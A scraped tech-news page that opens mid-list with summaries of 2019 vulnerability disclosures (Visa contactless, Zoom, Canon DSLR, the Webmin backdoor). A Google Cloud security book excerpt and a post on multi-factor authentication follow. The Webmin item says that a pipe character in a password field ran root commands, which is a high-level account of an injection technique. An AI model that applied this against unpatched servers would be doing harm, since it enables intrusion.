Stefan Savage, a computer science professor at the University of California at San Diego said, "This is a reminder that planes, like cars, depend on increasingly complex networked computer systems. They don't get to escape the vulnerabilities that come with this." Some companies still find it difficult to embrace unknown researchers finding flaws in their networks. Companies might be wary of ethical hackers given these people work as freelancers under no contract, potentially causing issues around confidentiality and whether the company’s security flaws will remain a secret. As hackers do not have a positive impression, the company fails to understand it is for their own betterment. 7. Vulnerability in contactless Visa card that can bypass payment limits On July 29 this year, two security researchers from Positive Technologies, Leigh-Anne Galloway, Cyber Security Resilience Lead and Tim Yunusov, Head of banking security, discovered flaws in Visa contactless cards, that can allow hackers to bypass the payment limits. The researchers added that the attack was tested with “five major UK banks where it successfully bypassed the UK contactless verification limit of £30 on all tested Visa cards, irrespective of the card terminal”. They also warned that this contactless Visa card vulnerability can be possible on cards outside the UK as well. When Forbes asked Visa about this vulnerability, they weren’t alarmed by the situation and said they weren’t planning on updating their systems anytime soon. “One key limitation of this type of attack is that it requires a physically stolen card that has not yet been reported to the card issuer. Likewise, the transaction must pass issuer validations and detection protocols. It is not a scalable fraud approach that we typically see criminals employ in the real world,” a Visa spokesperson told Forbes. 8. Mac Zoom Client vulnerability allowed ethical hackers to enable users’ camera On July 9, this year, a security researcher, Jonathan Leitschuh, publicly disclosed a vulnerability in Mac’s Zoom Client that could allow any malicious website to initiate users’ camera and forcibly join a Zoom call without their authority. Around 750,000 companies around the world who use the video conferencing app on their Macs, to conduct day-to-day business activities, were vulnerable. Leitschuh disclosed the issue on March 26 on Google’s Project Zero blog, with a 90-day disclosure policy. He also suggested a ‘quick fix’ which Zoom could have implemented by simply changing their server logic. Zoom took 10 days to confirm the vulnerability and held a meeting about how the vulnerability would be patched only 18 days before the end of the 90-day public disclosure deadline, i.e. June 11th, 2019. A day before the public disclosure, Zoom had only implemented the quick-fix solution. Apple quickly patched the vulnerable component on the same day when Leitschuh disclosed the vulnerability via Twitter (July 9). 9. Vulnerabilities in the PTP protocol of Canon’s EOS 80D DSLR camera allows injection of ransomware At the DefCon27 held this year, Eyal Itkin, a vulnerability researcher at Check Point Software Technologies, revealed vulnerabilities in the Canon EOS 80D DSLR. He demonstrated how vulnerabilities in the Picture Transfer Protocol (PTP) allowed him to infect the DSLR model with ransomware over a rogue WiFi connection. Itkin highlighted six vulnerabilities in the PTP that could easily allow a hacker to infiltrate the DSLRs and inject ransomware and lock the device. This could lead the users to pay ransom to free up their camera and picture files. Itkin’s team informed Canon about the vulnerabilities in their DSLR on March 31, 2019. On August 6, Canon published a security advisory informing users that, “at this point, there have been no confirmed cases of these vulnerabilities being exploited to cause harm” and asking them to take advised measures to ensure safety. 10. Security researcher at DefCon 27 revealed an old Webmin backdoor that allowed unauthenticated attackers to execute commands with root privileges on servers At the DefCon27, a Turkish security researcher, Özkan Mustafa Akkuş presented a zero-day remote code execution vulnerability in Webmin, a web-based system configuration system for Unix-like systems. This vulnerability, tracked as CVE-2019-15107, was found in the Webmin security feature and was present in the password reset page. It allowed an administrator to enforce a password expiration policy for other users’ accounts. It also allowed a remote, unauthenticated attacker to execute arbitrary commands with root privileges on affected servers by simply adding a pipe command (“|”) in the old password field through POST requests. The Webmin team was informed of the vulnerability on August 17th 2019. In response, the exploit code was removed and Webmin version 1.930 created and released to all users. Jamie Cameron, the author of Webmin, in a blog post talked about how and when this backdoor was injected. He revealed that this backdoor was no accident, and was in fact, injected deliberately in the code by a malicious actor. He wrote, “Neither of these were accidental bugs – rather, the Webmin source code had been maliciously modified to add a non-obvious vulnerability,” he wrote. TD;LR: Companies should welcome ethical hackers for their own good Ethical hackers are an important addition to our cybersecurity ecosystem. They help organizations examine security systems and analyze minor gaps that lead to compromising the entire organization. One way companies can seek their help is by arranging Bug bounty programs that allow ethical hackers to participate and report vulnerabilities to companies in exchange for rewards that can consist of money or, just recognition. Most of the other times, a white hat hacker may report of the vulnerability as a part of their research, which can be misunderstood by organizations as an attempt to break into their system or simply that they are confident of their internal security systems. Organizations should keep their software security upto date by welcoming additional support from these white hat hackers in finding undetected vulnerabilities. Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT How has ethical hacking benefited the software industry 5 pen testing rules of engagement: What to consider while performing Penetration testing Social engineering attacks – things to watch out for while online
Read more
  • 0
  • 0
  • 8689
article-image-understanding-security-features-in-the-google-cloud-platform-gcp
Vincy Davis
27 Jul 2019
10 min read
Save for later

Understanding security features in the Google Cloud Platform (GCP)

Vincy Davis
27 Jul 2019
10 min read
Google's long experience and success in, protecting itself against cyberattacks plays to our advantage as customers of the Google Cloud Platform (GCP). From years of warding off security threats, Google is well aware of the security implications of the cloud model. Thus, they provide a well-secured structure for their operational activities, data centers, customer data, organizational structure, hiring process, and user support. Google uses a global scale infrastructure to provide security to build commercial services, such as Gmail, Google search, Google Photos, and enterprise services, such as GCP and gsuite. This article is an excerpt taken from the book, "Google Cloud Platform for Architects.", written by Vitthal Srinivasan, Janani Ravi and Et al. In this book, you will learn about Google Cloud Platform (GCP) and how to manage robust, highly available, and dynamic solutions to drive business objective. This article gives an insight into the security features in Google Cloud Platform, the tools that GCP provides for users benefit, as well as some best practices and design choices for security. Security features at Google and on the GCP Let's start by discussing what we get directly by virtue of using the GCP. These are security protections that we would not be able to engineer for ourselves. Let's go through some of the many layers of security provided by the GCP. Datacenter physical security: Only a small fraction of Google employees ever get to visit a GCP data center. Those data centers, the zones that we have been talking so much about, probably would seem out of a Bond film to those that did—security lasers, biometric detectors, alarms, cameras, and all of that cloak-and-dagger stuff. Custom hardware and trusted booting: A specific form of security attacks named privileged access attacks are on the rise. These involve malicious code running from the least likely spots that you'd expect, the OS image, hypervisor, or boot loader. There is the only way to really protect against these, which is to design and build every single element in-house. Google has done that, including hardware, a firmware stack, curated OS images, and a hardened hypervisor. Google data centers are populated with thousands of servers connected to a local network. Google selects and validates building components from vendors and designs custom secure server boards and networking devices for server machines. Google has cryptographic signatures on all low-level components, such as BIOS, bootloader, kernel, and base OS, to validate the correct software stack is booting up. Data disposal: The detritus of the persistent disks and other storage devices that we use are also cleaned thoroughly by Google. This data destruction process involves several steps: an authorized individual will wipe the disk clean using a logical wipe. Then, a different authorized individual will inspect the wiped disk. The results of the erasure are stored and logged too. Then, the erased driver is released into inventory for reuse. If the disk was damaged and could not be wiped clean, it is stored securely and not reused, and such devices are periodically destroyed. Each facility where data disposal takes place is audited once a week. Data encryption: By default GCP always encrypts all customer data at rest as well as in motion. This encryption is automatic, and it requires no action on the user's part. Persistent disks, for instance, are already encrypted using AES-256, and the keys themselves are encrypted with master keys. All these key management and rotation is managed by Google. In addition to this default encryption, a couple of other encryption options exist as well, more on those in the following diagram: Secure service deployment: Google's security documentation will often refer to secure service deployment, and it is important to understand that in this context, the term service has a specific meaning in the context of security: a service is the application binary that a developer writes and runs on infrastructure. This secure service deployment is based on three attributes: Identity: Each service running on Google infrastructure has an associated service account identity. A service has to submit cryptographic credentials provided to it to prove its identity while making or receiving remote procedure calls (RPC) to other services. Clients use these identities to make sure that they are connecting to an intended server and the server will use to restrict access to data and methods to specific clients. Integrity: Google uses a cryptographic authentication and authorization technique at an application layer to provide strong access control at the abstraction level for interservice communication. Google has an ingress and egress filtering facility at various points in their network to avoid IP spoofing. With this approach, Google is able to maximize their network's performance and its availability. Isolation: Google has an effective sandbox technique to isolate services running on the same machine. This includes Linux user separation, language and kernel-based sandboxes, and hardware virtualization. Google also secures operation of sensitive services such as cluster orchestration in GKE on exclusively dedicated machines. Secure interservice communication: The term inter-service communication refers to GCP's resources and services talking to each other. For doing so, the owners of the services have individual whitelists of services which can access them. Using them, the owner of the service can also allow some IAM identities to connect with the services managed by them.Apart from that, Google engineers on the backend who would be responsible to manage the smooth and downtime-free running of the services are also provided special identities to access the services (to manage them, not to modify their user-input data). Google encrypts interservice communication by encapsulating application layer protocols in RPS mechanisms to isolate the application layer and to remove any kind of dependency on network security. Using Google Front End: Whenever we want to expose a service using GCP, the TLS certificate management, service registration, and DNS are managed by Google itself. This facility is called the Google Front End (GFE) service. For example, a simple file of Python code can be hosted as an application on App Engine that (application) will have its own IP, DNS name, and so on. In-built DDoS protections: Distributed Denial-of-Service attacks are very well studied, and precautions against such attacks are already built into many GCP services, notably in networking and load balancing. Load balancers can actually be thought of as hardened, bastion hosts that serve as lightning rods to attract attacks, and so are suitably hardened by Google to ensure that they can withstand those attacks. HTTP(S) and SSL proxy load balancers, in particular, can protect your backend instances from several threats, including SYN floods, port exhaustion, and IP fragment floods. Insider risk and intrusion detection: Google constantly monitors activities of all available devices in Google infrastructure for any suspicious activities. To secure employees' accounts, Google has replaced phishable OTP second factors with U2F, compatible security keys. Google also monitors its customer devices that employees use to operate their infrastructure. Google also conducts a periodic check on the status of OS images with security patches on customer devices. Google has a special mechanism to grant access privileges named application-level access management control, which exposes internal applications to only specific users from correctly managed devices and expected network and geographic locations. Google has a very strict and secure way to manage its administrative access privileges. They have a rigorous monitoring process of employee activities and also a predefined limit for administrative accesses for employees. Google-provided tools and options for security As we've just seen, the platform already does a lot for us, but we still could end up leaving ourselves vulnerable to attack if we don't go about designing our cloud infrastructure carefully. To begin with, let's understand a few facilities provided by the platform for our benefit. Data encryption options: We have already discussed Google's default encryption; this encrypts pretty much everything and requires no user action. So, for instance, all persistent disks are encrypted with AES-256 keys that are automatically created, rotated, and themselves encrypted by Google. In addition to default encryption, there are a couple of other encryption options available to users. Customer-managed encryption keys (CMEK) using Cloud KMS: This option involves a user taking control of the keys that are used, but still storing those keys securely on the GCP, using the key management service. The user is now responsible for managing the keys that are for creating, rotating and destroying them. The only GCP service that currently supports CMEK is BigQuery and is in beta stage for Cloud Storage. Customer-supplied encryption keys (CSEK): Here, the user specifies which keys are to be used, but those keys do not ever leave the user's premises. To be precise, the keys are sent to Google as a part of API service calls, but Google only uses these keys in memory and never persists them on the cloud. CSEK is supported by two important GCP services: data in cloud storage buckets as well as by persistent disks on GCE VMs. There is an important caveat here though: if you lose your key after having encrypted some GCP data with it, you are entirely out of luck. There will be no way for Google to recover that data. Cloud security scanner: Cloud security scanner is a GCP, provided security scanner for common vulnerabilities. It has long been available for App Engine applications, but is now also available in alpha for Compute Engine VMs. This handy utility will automatically scan and detect the following four common vulnerabilities: Cross-site scripting (XSS) Flash injection Mixed content (HTTP in HTTPS) The use of outdated/insecure libraries Like most security scanners, it automatically crawls an application, follows links, and tries out as many different types of user input and event handlers as possible. Some security best practices Here is a list of design choices that you could exercise to cope with security threats such as DDoS attacks: Use hardened bastion hosts such as load balancers (particularly HTTP(S) and SSL proxy load balancers). Make good use of the firewall rules in your VPC network. Ensure that incoming traffic from unknown sources, or on unknown ports, or protocols is not allowed through. Use managed services such as Dataflow and Cloud Functions wherever possible; these are serverless and so have smaller attack vectors. If your application lends itself to App Engine it has several security benefits over GCE or GKE, and it can also be used to autoscale up quickly, damping the impact of a DDOS attack. If you are using GCE VMs, consider the use of API rate limits to ensure that the number of requests to a given VM does not increase in an uncontrolled fashion. Use NAT gateways and avoid public IPs wherever possible to ensure network isolation. Use Google CDN as a way to offload incoming requests for static content. In the event of a storm of incoming user requests, the CDN servers will be on the edge of the network, and traffic into the core infrastructure will be reduced. Summary In this article, you learned that the GCP benefits from Google's long experience countering cyber-threats and security attacks targeted at other Google services, such as Google search, YouTube, and Gmail. There are several built-in security features that already protect users of the GCP from several threats that might not even be recognized as existing in an on-premise world. In addition to these in-built protections, all GCP users have various tools at their disposal to scan for security threats and to protect their data. To know more in-depth about the Google Cloud Platform (GCP), head over to the book, Google Cloud Platform for Architects. Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial] Build Hadoop clusters using Google Cloud Platform [Tutorial] Machine learning APIs for Google Cloud Platform
Read more
  • 0
  • 0
  • 8498

article-image-multi-factor-authentication-system-good-idea-for-an-app
Mehul Rajput
20 Aug 2018
7 min read
Save for later

Multi-Factor Authentication System – Is it a Good Idea for an App?

Mehul Rajput
20 Aug 2018
7 min read
With cyber-attacks on the rise, strong passwords no longer guarantee enough protection to keep your online profiles safe from hackers. In fact, other security features such as antivirus software, encryption technology, firewall deployment, etc. are also susceptible to being bypassed by hackers when targeted explicitly and dedicatedly. A multi-factor authentication (MFA) system adds another layer of app security to ensure enhanced data safety. According to a survey, hackers use weak or stolen user credentials in a staggering 95% of all web application attacks. MFA implementation can prevent unauthorized access to your personal accounts, even if someone manages to steal your sign-in details. It has  low complexity, and the application does not require significant amount of time or resources. What is Multi-Factor Authentication? Multi-factor Authentication emerged as a reaction to the vulnerability and susceptibility of the existing security systems. It is a method that confirms the users’ identity multiple times, before granting them access. These pieces of evidence validating a user’s identity include: Knowledge factor: something you know (for e.g. a username, password, security question) Possession factor: something you have (for e.g. a registered phone number, hardware or software token that generate authentication code, smartcard) Inherence factor: something you are (biometric information such as a finger, face, or voice recognition, retina scans) When a system utilizes two or more verification mechanisms, it is known as a multi-factor authentication (MFA). The ultimate idea behind MFA is that the more number of steps a user has to take to access sensitive information, the harder it becomes for the hacker to breach the security. One of the most common methods of authentication is a password coupled with a verification code of unique string of numbers sent via SMS or email. This method is commonly used by Google, Twitter, and other popular services. iPhone X’s Face ID and Windows Hello use the latest innovations in advanced biometric scanners for fingerprints, retinas, or faces, that are built-in the devices. Moreover, you can also use a specialized app on your phone called an “authenticator”. The app is pre-set to work for a service and receives the codes that can be used whenever needed. Popular authentication apps include Google Authenticator, DuoMobile, and Twilio Authy. The authentication apps are more secure when compared to receiving codes via SMS. This is primarily because text messages can be intercepted and phone numbers can be hijacked. On the other hand, authentication apps do not rely on your service carriers. In fact, they function even in the absence of cell service. Importance of Multi-factor Authentication System Is MFA worth the hassle of additional verification? Yes, it absolutely is. The extra layer of security can save valuable and sensitive personal information from falling into the wrong hands. Password theft is constantly evolving. Hackers employ numerous methods including phishing, pharming, brute force, and keylogging to break into online accounts. Moreover, anti-virus systems and advanced firewalls are often incompetent and inefficient without user authentication. According to a Gemalto report, more than 2.5 billion data records were lost, stolen, or exposed worldwide in 2017, an 88% increase from 2016. Furthermore, cyber-attacks rake up huge financial losses to the compromised organization and even mere individuals; basically anyone connected to the internet. It is estimated that by 2021, cyber-crime will cause global financial damages of around $6 trillion annually. Despite the alarming statistics, only 38% of the global organizations are prepared to combat a cyber-attack. MFA implementation can mitigate cyber-attacks considerably. Organizations with multi-fold authentication in place can strengthen their access security. It not only will help them safeguard the personal assets of their employees and customers, but also protect the company’s integrity and reputation. Why Multi-factor Authentication System in Apps is good Numerous variables are taken into consideration during the app development process. You want the app to have a friendly user interface that provides a seamless experience. An appealing graphical design and innovative features are also top priorities. Furthermore, apps undergo rigorous testing to make them bug-free before releasing into the market. However, security breaches can taint the reputation of your app, especially if it holds sensitive information about the users. Here is why MFA is a good idea for your app: Intensified security As mentioned earlier, MFA can bolster the protection and reduce the risk associated with only password-protected apps. Additional means of authentication not only challenges the users to prove their identity, it can also provide the security team with broader visibility into a possible identity theft. Moreover, it is not necessary to prompt the user for MFA every time they log into the app. You can use data analytics to trigger MFA for a risk-based approach. Take into account the user’s geographical location, IP address, device in use, etc. before challenging the user’s identity and asking for additional authentication. High-risk scenarios that justify MFA include logging in from an unknown device or new location, accessing the app from a new IP address, or attempting to gain admission into a highly sensitive resource for the first time. Opt for risk-based approach only if your app holds valuable and intimate information about your client that can cause irrevocable personal damage to the user if divulged. Otherwise, such an approach requires complex data analytics, machine learning, and contextual recognition that can be difficult and time-consuming to program. Simplified login process You may consider MFA implementation as complicated and cumbersome. However, if you have multiple apps under your helm, you can offer more advanced login solutions like single sign-on. Once the user identity is validated, they can access multiple apps covered under the single sign-on. This practice provides practicality to the MFA process as the users are saved from the fatigue and stress of repeated logins. Increased customer satisfaction A customer’s satisfaction and trust is one of the biggest driving factors for any organization. When you offer MFA to your users, it builds a sense of trustworthiness amongst them and they are more at ease when sharing personal details. Compliance with standards In addition to the benefits to the users, there are certain compliance standards, mandated by state, federal or other authorities, which specify that companies should implement MFA in explicit situations. Moreover, there are fixed guidelines from the National Institute of Standards and Technology (NIST) that help you choose the right verification methods. Therefore, it is imperative that you do not only comply with the regulations but also implement the recommended MFA methods. The key is to deploy an MFA system that is not too laborious but offers optimal steps of authentication. Given the sheer number of methods available for MFA, choose the most appropriate options based on: Sensitivity of the data and assets being protected Convenience and ease of usability for the customers Compliance with the specific regulations Expediting implementation and management for IT department Summary MFA can strengthen the security of sensitive data and protect the user’s identity. It adds another layer of shield to safeguard the client’s online accounts, obstructing the efforts of dedicated hacking. Moreover, it allows you to comply with the standard guidelines proposed by the authorized officials. However, individual MFA implementation across different user environments and cloud services can be inconvenient to the users. Deploy single sign-on or adopt risk-based approach to eliminate security vulnerability while facilitating user access. Author Bio Mehul Rajput is a CEO and co-founder of Mindinventory which specializes in Android and iOS app development and provide web and mobile app solutions from startup to enterprise level businesses. He is an avid blogger and writes on mobile technologies, mobile app, app marketing, app development, startup and business. 5 application development tools that will matter in 2018 Implement an API Design-first approach for building APIs [Tutorial] Access application data with Entity Framework in .NET Core [Tutorial]
Read more
  • 0
  • 10
  • 8324